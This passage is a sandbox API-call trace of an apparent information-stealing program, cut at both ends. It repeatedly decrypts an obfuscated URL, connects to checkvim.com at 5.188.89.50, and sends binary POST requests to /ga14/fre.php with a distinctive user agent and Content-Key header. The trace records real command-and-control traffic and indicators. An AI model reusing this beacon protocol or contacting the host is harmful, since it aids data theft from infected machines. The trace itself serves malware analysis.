out: hHeap=0x840000) returned 1 [0234.816] GetProcessHeap () returned 0x840000 [0234.816] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f950 | out: hHeap=0x840000) returned 1 [0234.816] GetProcessHeap () returned 0x840000 [0234.816] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0234.821] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x13f8) returned 0x324 [0234.862] Sleep (dwMilliseconds=0xea60) [0234.866] GetProcessHeap () returned 0x840000 [0234.866] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0234.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0234.867] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0234.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0234.982] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0235.017] GetProcessHeap () returned 0x840000 [0235.017] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0235.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.019] CryptImportKey (in: hProv=0x86f688, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9f0) returned 1 [0235.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.020] CryptSetKeyParam (hKey=0x87e9f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0235.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.021] CryptSetKeyParam (hKey=0x87e9f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0235.021] GetProcessHeap () returned 0x840000 [0235.021] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0235.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.023] CryptDecrypt (in: hKey=0x87e9f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0235.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.041] CryptDestroyKey (hKey=0x87e9f0) returned 1 [0235.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.042] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0235.042] GetProcessHeap () returned 0x840000 [0235.042] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0235.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0235.043] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0235.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0235.045] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0235.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0235.046] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0235.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0235.047] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0235.047] GetProcessHeap () returned 0x840000 [0235.047] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0235.053] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0235.095] GetProcessHeap () returned 0x840000 [0235.095] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0235.095] GetProcessHeap () returned 0x840000 [0235.095] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0235.095] GetProcessHeap () returned 0x840000 [0235.095] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0235.095] GetProcessHeap () returned 0x840000 [0235.095] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fd40 [0235.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.096] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0235.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.101] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0235.111] GetProcessHeap () returned 0x840000 [0235.111] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0235.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.112] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e470) returned 1 [0235.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.113] CryptSetKeyParam (hKey=0x87e470, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0235.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.114] CryptSetKeyParam (hKey=0x87e470, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0235.114] GetProcessHeap () returned 0x840000 [0235.114] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0235.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.115] CryptDecrypt (in: hKey=0x87e470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fd40, pdwDataLen=0x19f9a4 | out: pbData=0x87fd40, pdwDataLen=0x19f9a4) returned 1 [0235.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.116] CryptDestroyKey (hKey=0x87e470) returned 1 [0235.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.117] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0235.117] GetProcessHeap () returned 0x840000 [0235.117] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0235.118] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0235.118] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0235.119] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0235.119] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0235.120] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0235.120] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0235.120] GetProcessHeap () returned 0x840000 [0235.120] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0235.120] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0235.122] GetProcessHeap () returned 0x840000 [0235.122] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0235.122] socket (af=2, type=1, protocol=6) returned 0x328 [0235.122] connect (s=0x328, name=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0235.186] FreeAddrInfoW (pAddrInfo=0x8713d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0235.186] GetProcessHeap () returned 0x840000 [0235.186] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0235.187] GetProcessHeap () returned 0x840000 [0235.187] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0235.187] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0235.188] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0235.188] GetProcessHeap () returned 0x840000 [0235.188] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0235.188] GetProcessHeap () returned 0x840000 [0235.188] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0235.188] GetProcessHeap () returned 0x840000 [0235.188] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f7e8 [0235.188] GetProcessHeap () returned 0x840000 [0235.188] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0235.189] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0235.190] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0235.190] GetProcessHeap () returned 0x840000 [0235.190] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0235.190] GetProcessHeap () returned 0x840000 [0235.190] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0235.190] send (s=0x328, buf=0x873a58*, len=237, flags=0) returned 237 [0235.191] send (s=0x328, buf=0x87eb58*, len=159, flags=0) returned 159 [0235.191] GetProcessHeap () returned 0x840000 [0235.191] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0235.191] recv (in: s=0x328, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0235.553] GetProcessHeap () returned 0x840000 [0235.553] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0235.553] GetProcessHeap () returned 0x840000 [0235.553] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7e8 | out: hHeap=0x840000) returned 1 [0235.554] GetProcessHeap () returned 0x840000 [0235.554] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0235.554] GetProcessHeap () returned 0x840000 [0235.554] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0235.554] closesocket (s=0x328) returned 0 [0235.584] GetProcessHeap () returned 0x840000 [0235.584] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0235.584] GetProcessHeap () returned 0x840000 [0235.584] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0235.584] GetProcessHeap () returned 0x840000 [0235.584] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd40 | out: hHeap=0x840000) returned 1 [0235.584] GetProcessHeap () returned 0x840000 [0235.584] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0235.584] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1328) returned 0x328 [0235.586] Sleep (dwMilliseconds=0xea60) [0235.589] GetProcessHeap () returned 0x840000 [0235.589] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f878 [0235.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.590] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0235.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.597] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0235.611] GetProcessHeap () returned 0x840000 [0235.611] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0235.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.612] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0235.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.613] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0235.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.615] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0235.615] GetProcessHeap () returned 0x840000 [0235.615] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0235.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.616] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f878, pdwDataLen=0x19f9a4 | out: pbData=0x87f878, pdwDataLen=0x19f9a4) returned 1 [0235.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.617] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0235.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.618] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0235.618] GetProcessHeap () returned 0x840000 [0235.618] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0235.619] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0235.620] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0235.621] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0235.621] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0235.622] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0235.623] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0235.623] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0235.624] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0235.624] GetProcessHeap () returned 0x840000 [0235.624] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713f8 [0235.624] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0235.624] GetProcessHeap () returned 0x840000 [0235.624] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713f8 | out: hHeap=0x840000) returned 1 [0235.624] GetProcessHeap () returned 0x840000 [0235.624] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0235.624] GetProcessHeap () returned 0x840000 [0235.624] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f878 | out: hHeap=0x840000) returned 1 [0235.624] GetProcessHeap () returned 0x840000 [0235.624] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fcb0 [0235.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.625] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0235.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.634] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f8a8) returned 1 [0235.644] GetProcessHeap () returned 0x840000 [0235.644] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0235.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.646] CryptImportKey (in: hProv=0x86f8a8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e570) returned 1 [0235.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.647] CryptSetKeyParam (hKey=0x87e570, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0235.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.648] CryptSetKeyParam (hKey=0x87e570, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0235.649] GetProcessHeap () returned 0x840000 [0235.649] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0235.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.650] CryptDecrypt (in: hKey=0x87e570, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fcb0, pdwDataLen=0x19f9a4 | out: pbData=0x87fcb0, pdwDataLen=0x19f9a4) returned 1 [0235.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.651] CryptDestroyKey (hKey=0x87e570) returned 1 [0235.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0235.658] CryptReleaseContext (hProv=0x86f8a8, dwFlags=0x0) returned 1 [0235.755] GetProcessHeap () returned 0x840000 [0235.755] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0235.756] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0235.757] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0235.757] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0235.758] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0235.759] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0235.759] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0235.759] GetProcessHeap () returned 0x840000 [0235.759] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0235.762] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0235.766] GetProcessHeap () returned 0x840000 [0235.766] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0235.766] socket (af=2, type=1, protocol=6) returned 0x32c [0235.766] connect (s=0x32c, name=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0235.841] FreeAddrInfoW (pAddrInfo=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0235.841] GetProcessHeap () returned 0x840000 [0235.841] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fa40 [0235.841] GetProcessHeap () returned 0x840000 [0235.841] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0235.842] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0235.844] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0235.844] GetProcessHeap () returned 0x840000 [0235.845] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0235.845] GetProcessHeap () returned 0x840000 [0235.845] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0235.845] GetProcessHeap () returned 0x840000 [0235.845] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb48 [0235.845] GetProcessHeap () returned 0x840000 [0235.845] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0235.846] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0235.847] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0235.847] GetProcessHeap () returned 0x840000 [0235.848] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0235.848] GetProcessHeap () returned 0x840000 [0235.848] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0235.848] send (s=0x32c, buf=0x873a58*, len=237, flags=0) returned 237 [0235.849] send (s=0x32c, buf=0x87eb58*, len=159, flags=0) returned 159 [0235.849] GetProcessHeap () returned 0x840000 [0235.849] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0235.849] recv (in: s=0x32c, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0236.220] GetProcessHeap () returned 0x840000 [0236.220] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0236.220] GetProcessHeap () returned 0x840000 [0236.220] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0236.220] GetProcessHeap () returned 0x840000 [0236.220] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0236.220] GetProcessHeap () returned 0x840000 [0236.220] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fa40 | out: hHeap=0x840000) returned 1 [0236.220] closesocket (s=0x32c) returned 0 [0236.221] GetProcessHeap () returned 0x840000 [0236.222] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0236.222] GetProcessHeap () returned 0x840000 [0236.222] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0236.222] GetProcessHeap () returned 0x840000 [0236.222] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcb0 | out: hHeap=0x840000) returned 1 [0236.222] GetProcessHeap () returned 0x840000 [0236.222] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0236.222] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1304) returned 0x32c [0236.224] Sleep (dwMilliseconds=0xea60) [0236.225] GetProcessHeap () returned 0x840000 [0236.225] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f758 [0236.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.226] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0236.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.284] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0236.296] GetProcessHeap () returned 0x840000 [0236.296] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0236.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.298] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e330) returned 1 [0236.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0236.298] CryptSetKeyParam (hKey=0x87e330, dwParam=0x4, 